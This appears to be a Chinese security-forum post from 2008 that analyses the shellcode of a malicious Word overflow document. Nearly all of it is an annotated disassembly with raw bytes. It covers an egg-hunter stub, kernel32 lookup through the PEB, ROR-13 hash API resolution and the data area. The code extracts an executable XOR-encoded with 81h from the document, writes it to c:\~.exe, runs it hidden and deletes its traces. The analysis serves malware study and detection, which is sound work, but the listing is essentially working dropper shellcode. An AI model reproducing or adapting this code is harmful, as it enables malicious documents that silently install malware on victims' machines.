偶是新手,这个ShellCode也没有什么新意,如果说有的话,就在API的查找上还算有点优点。
;-----------------------------------------------------------------------
; Stage 1: locator stub.
; Scans memory starting at esi+20000h, one byte at a time, for the dword
; A1649090h (bytes 90 90 64 A1 = the nop; nop; mov eax, fs:[...] that opens
; stage 2 at 00B8893E below) and jumps to the SECOND match.
; In:    esi = scan start (set before this stub; not visible in the listing)
; Out:   does not return; jmp esi into stage 2
; Clobb: eax, ebx, esi, flags
; There is no upper bound on the scan: if the pattern is absent the read
; walks into unmapped memory and the host process faults (a failed attempt
; shows up as a crash of the host application).
; NOTE(review): why the second match is used is not recoverable from this
; listing; the cmp immediate at 00125B93 itself contains the same four bytes,
; so a scan that passes over this stub would count it as a match.
;-----------------------------------------------------------------------
00125B88 33DB xor ebx, ebx ; ebx = match counter
00125B8A 81C6 00000200 add esi, 20000 ; skip the first 128 KiB from the start point
00125B90 46 inc esi ; advance one byte (unaligned dword reads)
00125B91 8B06 mov eax, dword ptr [esi]
00125B93 3D 909064A1 cmp eax, A1649090 ; marker for the start of stage-2 code (bytes 90 90 64 A1)
00125B98 ^ 75 F6 jnz short 00125B90
00125B9A 43 inc ebx ; matched: count it
00125B9B 83FB 02 cmp ebx, 2 ; keep scanning until the second match
00125B9E ^ 75 F0 jnz short 00125B90
00125BA0 FFE6 jmp esi ; enter stage 2 at the matched nops
;-----------------------------------------------------------------------
; Stage 2: main payload. Entered by the locator's jmp esi at the two nops.
; Flow: find kernel32's base via the PEB -> (via 00B88BBF) call/pop to get a
; pointer to the data area at 00B88BC4 -> build a 200h-byte table on the
; stack (edi) holding string pointers and resolved API addresses -> locate
; the unicode path of the open .doc on the stack -> CopyFileW it to c:\~$ ->
; read the payload length from the last 4 bytes of that copy, read that many
; bytes preceding it, XOR every byte with 81h -> write the result to
; c:\~.exe and append 0FFh bytes taken from the .doc path -> WinExec
; c:\~.exe with nCmdShow=0 -> DeleteFileW c:\~$ -> ExitProcess.
;
; Observable artifacts (all from this listing): files c:\~$ (deleted at the
; end) and c:\~.exe (left on disk); the embedded PE sits at the end of the
; document behind a 4-byte length trailer and is obfuscated with a
; single-byte XOR key 81h, so it can be recovered statically from the
; document; the host process is terminated rather than returned to.
;
; Stack table layout (edi = esp after sub esp, 200):
;   +04  dword from data (000A2000h), overwritten by the 4-byte length trailer
;   +08  kernel32 base
;   +0C  ptr "c:\~$"    (unicode)
;   +10  ptr "c:\~.exe" (unicode)
;   +14  ptr to the open document's unicode path (found on the stack)
;   +1C..+44 resolved API addresses (see the resolve sequence below)
;   +5C  GlobalAlloc buffer    +60 handle of c:\~$    +64 handle of c:\~.exe
;   +80  ptr "c:\~.exe" (ascii) +A0 lpNumberOfBytesRead/Written scratch
;-----------------------------------------------------------------------
00B8893E 90 nop ; these two nops plus the 64:A1 below are the marker the locator scans for
00B8893F 90 nop
00B88940 64:A1 30000000 mov eax, dword ptr fs:[30] ; eax = PEB (TEB+30h); the next four instructions walk it to kernel32's base
00B88946 8B40 0C mov eax, dword ptr [eax+C] ; eax = PEB.Ldr
00B88949 8B70 1C mov esi, dword ptr [eax+1C] ; esi = Ldr.InInitializationOrderModuleList.Flink (1st entry)
00B8894C AD lods dword ptr [esi] ; eax = Flink of that entry = 2nd module in initialization order
00B8894D 8B70 08 mov esi, dword ptr [eax+8] ; 7C800000h ; esi = DllBase of that entry = kernel32 on the author's XP system; NOTE(review): on later Windows versions the 2nd init-order module is not kernel32, so this stage is OS-specific
00B88950 E9 6A020000 jmp 00B88BBF ; -> call 00B88955: the call pushes 00B88BC4 (data area) and lands below
00B88955 58 pop eax ; eax = return address pushed by the call at 00B88BBF = start of the data area
00B88956 81EC 00020000 sub esp, 200 ; reserve the 200h-byte table on the stack
00B8895C 8BFC mov edi, esp ; edi = table base for the rest of the stage
00B8895E 8B18 mov ebx, dword ptr [eax] ; 000A2000h ; first dword of the data area (meaning not evident from the listing)
00B88960 895F 04 mov dword ptr [edi+4], ebx ; tbl+4
00B88963 8977 08 mov dword ptr [edi+8], esi ; tbl+8 = kernel32 base
00B88966 83C0 04 add eax, 4
00B88969 8947 0C mov dword ptr [edi+C], eax ; tbl+0C = "c:\~$" unicode
00B8896C 83C0 0C add eax, 0C
00B8896F 8947 10 mov dword ptr [edi+10], eax ; tbl+10 = "c:\~.exe" unicode
00B88972 83C0 12 add eax, 12
00B88975 8987 80000000 mov dword ptr [edi+80], eax ; tbl+80 = "c:\~.exe" ascii
;;;; Locate the unicode path of the open document on the stack.
;;;; Scans downward from an esp-derived address (4 bytes first, then 1 byte per
;;;; iteration) for "oc" with ".d" 4 bytes lower (i.e. ".doc"), then walks back
;;;; byte by byte (at most 0C8h bytes) to ":\" and takes the character before it
;;;; (the drive letter) as the start of the path. There is no lower bound: if
;;;; no match exists the scan reads off the bottom of the stack and the host faults.
00B8897B 57 push edi ; save the table pointer (edi is reused as the scan cursor)
00B8897C 8BFC mov edi, esp
00B8897E 81F7 FFFF0000 xor edi, 0FFFF ; flip the low 16 bits of esp; NOTE(review): presumably meant to land in the upper part of the same 64 KiB stack region where caller frames live — intent not recoverable from the listing
00B88984 4F dec edi
00B88985 4F dec edi
00B88986 4F dec edi
00B88987 4F dec edi ; outer loop head: all three back-jumps below return here, so the scan then moves 1 byte per iteration
00B88988 813F 6F006300 cmp dword ptr [edi], 63006F ; "oc" unicode
00B8898E ^ 75 F7 jnz short 00B88987
00B88990 4F dec edi
00B88991 4F dec edi
00B88992 4F dec edi
00B88993 4F dec edi
00B88994 813F 2E006400 cmp dword ptr [edi], 64002E ; ".d" unicode -> ".doc" starts at edi
00B8899A ^ 75 EB jnz short 00B88987
00B8899C 68 C8000000 push 0C8
00B889A1 59 pop ecx ; ecx = 0C8h = max bytes to walk back looking for ":\"
00B889A2 8BF7 mov esi, edi
00B889A4 4E dec esi
00B889A5 813E 3A005C00 cmp dword ptr [esi], 5C003A ; ":\" unicode
00B889AB 74 04 je short 00B889B1
00B889AD ^ E2 F5 loopd short 00B889A4
00B889AF ^ EB D6 jmp short 00B88987 ; no ":\" within 0C8h bytes: resume the outer scan
00B889B1 4E dec esi
00B889B2 4E dec esi ; esi -= 2: back to the drive letter; esi = full unicode path of the original .doc
00B889B3 5F pop edi ; restore the table pointer
00B889B4 8977 14 mov dword ptr [edi+14], esi ; tbl+14 = document path
;;;; Resolve 11 kernel32 exports through the hash resolver at 00B88B6B
;;;; (push base, push ROR-13 name hash, call; retn 8). The hash constants are
;;;; static and make a usable signature for this sample.
00B889B7 FF77 08 push dword ptr [edi+8] ; kernel32 base
00B889BA 68 EC97030C push 0C0397EC ; name hash
00B889BF E8 A7010000 call 00B88B6B
00B889C4 8947 1C mov dword ptr [edi+1C], eax ;GlobalAlloc
00B889C7 FF77 08 push dword ptr [edi+8]
00B889CA 68 F622B97C push 7CB922F6
00B889CF E8 97010000 call 00B88B6B
00B889D4 8947 20 mov dword ptr [edi+20], eax ;GlobalFree
00B889D7 FF77 08 push dword ptr [edi+8]
00B889DA 68 BB17007C push 7C0017BB
00B889DF E8 87010000 call 00B88B6B
00B889E4 8947 24 mov dword ptr [edi+24], eax ;CreateFileW
00B889E7 FF77 08 push dword ptr [edi+8]
00B889EA 68 FB97FD0F push 0FFD97FB
00B889EF E8 77010000 call 00B88B6B
00B889F4 8947 28 mov dword ptr [edi+28], eax ;CloseHandle
00B889F7 FF77 08 push dword ptr [edi+8]
00B889FA 68 1665FA10 push 10FA6516
00B889FF E8 67010000 call 00B88B6B
00B88A04 8947 2C mov dword ptr [edi+2C], eax ;ReadFile
00B88A07 FF77 08 push dword ptr [edi+8]
00B88A0A 68 1F790AE8 push E80A791F
00B88A0F E8 57010000 call 00B88B6B
00B88A14 8947 30 mov dword ptr [edi+30], eax ;WriteFile
00B88A17 FF77 08 push dword ptr [edi+8]
00B88A1A 68 3BB0FFC2 push C2FFB03B
00B88A1F E8 47010000 call 00B88B6B
00B88A24 8947 34 mov dword ptr [edi+34], eax ;DeleteFileW
00B88A27 FF77 08 push dword ptr [edi+8]
00B88A2A 68 AC08DA76 push 76DA08AC
00B88A2F E8 37010000 call 00B88B6B
00B88A34 8947 38 mov dword ptr [edi+38], eax ;SetFilePointer
00B88A37 FF77 08 push dword ptr [edi+8]
00B88A3A 68 98FE8A0E push 0E8AFE98
00B88A3F E8 27010000 call 00B88B6B
00B88A44 8947 3C mov dword ptr [edi+3C], eax ;WinExec
00B88A47 FF77 08 push dword ptr [edi+8]
00B88A4A 68 7489EC99 push 99EC8974
00B88A4F E8 17010000 call 00B88B6B
00B88A54 8947 40 mov dword ptr [edi+40], eax ;CopyFileW
00B88A57 FF77 08 push dword ptr [edi+8]
00B88A5A 68 7ED8E273 push 73E2D87E
00B88A5F E8 07010000 call 00B88B6B
00B88A64 8947 44 mov dword ptr [edi+44], eax ;ExitProcess
;****************************************************************************
;;;; Actions. All calls are stdcall, arguments pushed right-to-left.
00B88A67 FF77 10 push dword ptr [edi+10] ; "c:\~.exe" unicode
00B88A6A FF57 34 call dword ptr [edi+34] ;DeleteFileW: remove any earlier c:\~.exe
00B88A6D FF77 0C push dword ptr [edi+C] ; "c:\~$"
00B88A70 FF57 34 call dword ptr [edi+34] ;DeleteFileW: remove any earlier c:\~$
00B88A73 6A 00 push 0 ; bFailIfExists = FALSE
00B88A75 FF77 0C push dword ptr [edi+C] ; lpNewFileName = "c:\~$"
00B88A78 FF77 14 push dword ptr [edi+14] ; lpExistingFileName = path of the open .doc
00B88A7B FF57 40 call dword ptr [edi+40] ;CopyFileW: copy the document (which carries the payload) to c:\~$
00B88A7E 6A 00 push 0 ; hTemplateFile
00B88A80 68 80000000 push 80 ; dwFlagsAndAttributes = FILE_ATTRIBUTE_NORMAL
00B88A85 6A 03 push 3 ; dwCreationDisposition = OPEN_EXISTING
00B88A87 6A 00 push 0 ; lpSecurityAttributes
00B88A89 6A 00 push 0 ; dwShareMode = 0
00B88A8B 68 00000080 push 80000000 ; dwDesiredAccess = GENERIC_READ
00B88A90 FF77 0C push dword ptr [edi+C] ; lpFileName = "c:\~$"
00B88A93 FF57 24 call dword ptr [edi+24] ; kernel32.CreateFileW: open c:\~$ for reading
00B88A96 8947 60 mov dword ptr [edi+60], eax ; tbl+60 = handle of c:\~$
00B88A99 6A 02 push 2 ; dwMoveMethod = FILE_END
00B88A9B 6A 00 push 0 ; lpDistanceToMoveHigh
00B88A9D 6A FC push -4 ; lDistanceToMove = -4
00B88A9F FF77 60 push dword ptr [edi+60]
00B88AA2 FF57 38 call dword ptr [edi+38] SetFilePointer ; seek to 4 bytes before EOF (author: offset 29FA5h in this sample)
00B88AA5 6A 00 push 0 ; lpOverlapped
00B88AA7 8D9F A0000000 lea ebx, dword ptr [edi+A0]
00B88AAD 53 push ebx ; lpNumberOfBytesRead = tbl+A0
00B88AAE 6A 04 push 4 ; read 4 bytes: the trailer holds the payload length (author: 18BA5h)
00B88AB0 8D5F 04 lea ebx, dword ptr [edi+4]
00B88AB3 53 push ebx ; lpBuffer = tbl+4
00B88AB4 FF77 60 push dword ptr [edi+60]
00B88AB7 FF57 2C call dword ptr [edi+2C] ReadFile 刚才打开的c:\~$ ; ReadFile from the copy c:\~$ opened above: tbl+4 = payload length
00B88ABA FF77 04 push dword ptr [edi+4] ; dwBytes = payload length (18BA5h)
00B88ABD 6A 40 push 40 ; uFlags = 40h (GMEM_ZEROINIT)
00B88ABF FF57 1C call dword ptr [edi+1C] GlobalAlloc ; allocate the decode buffer
00B88AC2 8947 5C mov dword ptr [edi+5C], eax ; tbl+5C = decode buffer
00B88AC5 8B5F 04 mov ebx, dword ptr [edi+4]
00B88AC8 83C3 04 add ebx, 4
00B88ACB F7D3 not ebx
00B88ACD 43 inc ebx ; ebx = -(length + 4): the payload starts that far before EOF
00B88ACE 6A 02 push 2 ; FILE_END
00B88AD0 6A 00 push 0
00B88AD2 53 push ebx
00B88AD3 FF77 60 push dword ptr [edi+60]
00B88AD6 FF57 38 call dword ptr [edi+38] ; SetFilePointer: seek to the start of the embedded payload (author: offset 11400h in this sample)
00B88AD9 6A 00 push 0
00B88ADB 8D9F A0000000 lea ebx, dword ptr [edi+A0]
00B88AE1 53 push ebx
00B88AE2 FF77 04 push dword ptr [edi+4] ; nNumberOfBytesToRead = payload length (18BA5h)
00B88AE5 FF77 5C push dword ptr [edi+5C] ; lpBuffer = decode buffer
00B88AE8 FF77 60 push dword ptr [edi+60]
00B88AEB FF57 2C call dword ptr [edi+2C] ;ReadFile: payload -> buffer (the byte count actually read is never checked)
00B88AEE FF77 60 push dword ptr [edi+60]
00B88AF1 FF57 28 call dword ptr [edi+28] ;CloseHandle: done with the copy c:\~$
00B88AF4 8B47 04 mov eax, dword ptr [edi+4] ; eax = byte count
00B88AF7 8B5F 5C mov ebx, dword ptr [edi+5C] ; ebx = buffer cursor
00B88AFA 8033 81 xor byte ptr [ebx], 81 ; decode the embedded PE: single-byte XOR key 81h
00B88AFD 43 inc ebx
00B88AFE 48 dec eax
00B88AFF 83F8 00 cmp eax, 0 ; post-decrement test: a zero length would wrap and run ~4G iterations
00B88B02 ^ 75 F6 jnz short 00B88AFA
00B88B04 6A 00 push 0 ; hTemplateFile
00B88B06 68 80000000 push 80 ; FILE_ATTRIBUTE_NORMAL
00B88B0B 6A 02 push 2 ; CREATE_ALWAYS
00B88B0D 6A 00 push 0
00B88B0F 6A 00 push 0
00B88B11 68 00000040 push 40000000 ; GENERIC_WRITE
00B88B16 FF77 10 push dword ptr [edi+10] ; "c:\~.exe" unicode
00B88B19 FF57 24 call dword ptr [edi+24] ;CreateFileW: create c:\~.exe
00B88B1C 8947 64 mov dword ptr [edi+64], eax ; tbl+64 = handle of c:\~.exe
00B88B1F 6A 00 push 0
00B88B21 8D9F A0000000 lea ebx, dword ptr [edi+A0]
00B88B27 53 push ebx
00B88B28 FF77 04 push dword ptr [edi+4] ; nNumberOfBytesToWrite = payload length (18BA5h)
00B88B2B FF77 5C push dword ptr [edi+5C] ; decoded buffer
00B88B2E 50 push eax ; handle (eax still holds the CreateFileW result; nothing above writes eax)
00B88B2F FF57 30 call dword ptr [edi+30] ;WriteFile: decoded PE -> c:\~.exe
00B88B32 6A 00 push 0
00B88B34 8D9F A0000000 lea ebx, dword ptr [edi+A0]
00B88B3A 53 push ebx
00B88B3B 68 FF000000 push 0FF ; 0FFh bytes ...
00B88B40 FF77 14 push dword ptr [edi+14] ; ... starting at the original .doc path on the stack (unicode; bytes past the path are whatever follows it on the stack)
00B88B43 FF77 64 push dword ptr [edi+64] ; exe handle
00B88B46 FF57 30 call dword ptr [edi+30] ;WriteFile: appends those bytes to the exe; presumably read back by the dropped program — not shown in this listing
00B88B49 FF77 64 push dword ptr [edi+64]
00B88B4C FF57 28 call dword ptr [edi+28] ;CloseHandle exe handle
00B88B4F FF77 5C push dword ptr [edi+5C]
00B88B52 FF57 20 call dword ptr [edi+20] ;GlobalFree: decode buffer
00B88B55 6A 00 push 0 ; uCmdShow = 0 (SW_HIDE)
00B88B57 FFB7 80000000 push dword ptr [edi+80] ; "c:\~.exe" ascii
00B88B5D FF57 3C call dword ptr [edi+3C] ;WinExec: run the dropped file without a window
00B88B60 FF77 0C push dword ptr [edi+C] ; "c:\~$"
00B88B63 FF57 34 call dword ptr [edi+34] ; DeleteFile: remove the copy; c:\~.exe is left on disk
00B88B66 6A 00 push 0 ; uExitCode = 0
00B88B68 FF57 44 call dword ptr [edi+44] ;ExitProcess: terminates the host instead of returning (the decoy document is not re-opened here)
;**********************************************************************
;-----------------------------------------------------------------------
; Subroutine: resolve a kernel32 export by name hash.
; C-equivalent: DWORD __stdcall resolve(DWORD hash, DWORD base)   (retn 8)
; In:    [ebp+8] = hash of the export name (pushed last by the caller)
;        [ebp+C] = module base (kernel32)
; Out:   eax = virtual address of the export
; Hash:  h = ror(h, 13) + c over each byte of the name (ROR-13 additive
;        hash; bytes are sign-extended, irrelevant for ASCII names). The
;        terminator test is cmp dh, dl on the movsx'd byte: dh is the sign
;        extension of dl, so they are equal only for 00h (or 0FFh).
; Clobb: ebx, ecx, edx, flags (ebx is left pointing at AddressOfFunctions);
;        esi, edi, ebp are saved and restored.
; Walks: e_lfanew ([base+3Ch]) -> export directory RVA at [e_lfanew+78h]
;        (data directory 0) -> AddressOfNames (+20h), AddressOfNameOrdinals
;        (+24h), AddressOfFunctions (+1Ch).
; No bound on the name loop: an unmatched hash walks past the end of
; AddressOfNames into unrelated memory.
;-----------------------------------------------------------------------
00B88B6B 55 push ebp
00B88B6C 8BEC mov ebp, esp
00B88B6E 57 push edi
00B88B6F 8B7D 08 mov edi, dword ptr [ebp+8] ; edi = target hash
00B88B72 8B5D 0C mov ebx, dword ptr [ebp+C] ; ebx = module base (Kernel32.dll)
00B88B75 56 push esi
00B88B76 8B73 3C mov esi, dword ptr [ebx+3C] ; e_lfanew
00B88B79 8B741E 78 mov esi, dword ptr [esi+ebx+78] ; export directory RVA
00B88B7D 03F3 add esi, ebx ; esi = export directory VA
00B88B7F 56 push esi ; save the export directory for the lookup after the loop
00B88B80 8B76 20 mov esi, dword ptr [esi+20] ; AddressOfNames RVA
00B88B83 03F3 add esi, ebx ; esi = names table VA
00B88B85 33C9 xor ecx, ecx
00B88B87 49 dec ecx ; ecx = -1: name index, pre-incremented below
00B88B88 41 inc ecx ; next name
00B88B89 AD lods dword ptr [esi] ; eax = name RVA; esi -> next table entry
00B88B8A 03C3 add eax, ebx ; eax = name VA
00B88B8C 56 push esi ; save the names-table position across the hash loop
00B88B8D 33F6 xor esi, esi ; esi = running hash
00B88B8F 0FBE10 movsx edx, byte ptr [eax]
00B88B92 3AF2 cmp dh, dl ; equal only when the byte is 00h (or 0FFh): end of name
00B88B94 74 08 je short 00B88B9E
00B88B96 C1CE 0D ror esi, 0D
00B88B99 03F2 add esi, edx ; h = ror(h, 13) + c
00B88B9B 40 inc eax
00B88B9C ^ EB F1 jmp short 00B88B8F
00B88B9E 3BFE cmp edi, esi ; hash match?
00B88BA0 5E pop esi ; restore the names-table position (pop leaves flags intact for the jnz)
00B88BA1 ^ 75 E5 jnz short 00B88B88
00B88BA3 5A pop edx ; edx = export directory
00B88BA4 8BEB mov ebp, ebx ; ebp used as the base temporarily; the caller's ebp is restored by the pop below
00B88BA6 8B5A 24 mov ebx, dword ptr [edx+24] ; AddressOfNameOrdinals RVA
00B88BA9 03DD add ebx, ebp
00B88BAB 66:8B0C4B mov cx, word ptr [ebx+ecx*2] ; cx = ordinal for name index ecx (upper 16 bits of ecx are 0 since it is a small count)
00B88BAF 8B5A 1C mov ebx, dword ptr [edx+1C] ; AddressOfFunctions RVA
00B88BB2 03DD add ebx, ebp
00B88BB4 8B048B mov eax, dword ptr [ebx+ecx*4] ; function RVA
00B88BB7 03C5 add eax, ebp ; eax = function VA
00B88BB9 5E pop esi
00B88BBA 5F pop edi
00B88BBB 5D pop ebp
00B88BBC C2 0800 retn 8 ; stdcall: drops the hash and base arguments
00B88BBF E8 91FDFFFF call 00B88955 ; reached from the jmp at 00B88950; the call pushes 00B88BC4 as its return address, which 00B88955 pops as the data-area pointer (call/pop position-independence trick)
; Data area (offsets from 00B88BC4, the value popped into eax at 00B88955):
;   +00  dword 000A2000h (stored at tbl+4; meaning not evident from the listing)
;   +04  "c:\~$"    unicode, NUL-terminated  (tbl+0C)
;   +10  "c:\~.exe" unicode, NUL-terminated  (tbl+10)
;   +22  "c:\~.exe" ascii                    (tbl+80)
00B88BC4 00 20 0A 00 63 00 3A 00 5C 00 7E 00 24 00 00 00 . ..c.:.\.~.$...
00B88BD4 63 00 3A 00 5C 00 7E 00 2E 00 65 00 78 00 65 00 c.:.\.~...e.x.e.
00B88BE4 00 00 63 3A 5C 7E 2E 65 78 65 ..c:\~.exe
- 标 题:一个word溢出样本ShellCode的分析
- 作 者:alexcom
- 时 间:2008-10-28 11:59
- 链 接:http://bbs.pediy.com/showthread.php?t=75517